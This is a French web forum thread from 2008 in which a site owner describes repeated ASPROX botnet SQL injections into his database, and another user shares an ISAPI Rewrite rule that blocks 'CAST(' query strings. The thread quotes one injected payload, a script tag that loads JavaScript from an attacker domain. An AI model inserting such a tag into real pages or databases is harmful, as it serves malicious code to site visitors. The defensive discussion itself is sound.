begin process at 2012 02 13 01:45:05
  Trouver un code source :
 
dans
 
Accueil > Forum > 

ASP / ASP3

 > 

Système

 > 

Sécurité

 > 

Injection SQL - ASPROX BOTNET


Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Injection SQL - ASPROX BOTNET

lundi 2 juin 2008 à 16:24:32 | Injection SQL - ASPROX BOTNET

tbbuim1

Bonjour à tous,

Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script>
à l'intérieur de mes champs dans la base de données.

voir
http://www.authsecu.com/news/315-news-securite-entreprise-renouveau-des-attaques-par-injection-sql-selon-ibm.htm
http://www.matchent.com/wpress/?q=node/309
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/

J'ai contrôlé les rq et mis une fonction anti injection pour chaque rq pouvant être attaquées, mais rien n'y fait. fonction : Fn_NoSqlInject

j'ai fait la recherche du trojan msscntr32.exe mais je ne l'ai pas trouvé.

Bref, mon site est continuellement attaqué et j'ai beau enlever les lignes de la table qui sont infectées, elles se réinfectent tous les jours.

Quelqu'un a une idée?

Merci pour votre aide

TBBUIM
mercredi 11 juin 2008 à 10:16:46 | Re : Injection SQL - ASPROX BOTNET

TompouceTN

Bonjour,

J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.
RewriteRule .*CAST\(.* . [F,I]
Depuis, plus de soucis.

Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il  y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !

Bon courage
Tom


Cette discussion est classée dans : sql, www, injection, botnet, com


Répondre à ce message

Sujets en rapport avec ce message

Url rewriting [ par hudon77 ] Bonjour à tous! Dans mon site je veux donner un URL unique a chaque utilisateur. ex: www.monsite.com/Nathalie, www.monsite.com/Roger J'ai exploré oracle_forms builder_pl/sql [ par maymdeini ] bonjour j'ai besion d' un exemple bien clair de oracle-forms builder -pl/sql parceque j' entraint de developper un projet sous oracle-forms builder-pl Update table sql dans page .aspx [ par hugo7 ] Bonjour je voudrais savoir comment mettre à jour une table d'une de mes bases de donnée directement dans ma page aspx avec une condition : Dans ma ta ajouter un enregistrement dand une base de données sql [ par miss0005 ] bonsoir a tous [^^happy13] Je suis débutante en windev et je voudrais bien une aide pour mon projet. En effet, je veux ajouter a ma base de données sq Formulaire actualisation asp-sql server [ par loic2810 ] Bonjour, Je travaille sous ASP avec une base SQL SERVER. Quand je crée un formulaire d'acualisation asp tous les champs à actualiser sont remplis par Connexion d'une application web avec une bdd sql server 2005 [ par wislam2007 ] bonjour, Je suis entrain de développer une application web (web developer express edition) qui doit se connecté avec une base de donnée sql server 20


Nos sponsors


Sondage...

CalendriCode

Février 2012
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
272829    

Consulter la suite du CalendriCode

Photothèque

 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,094 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales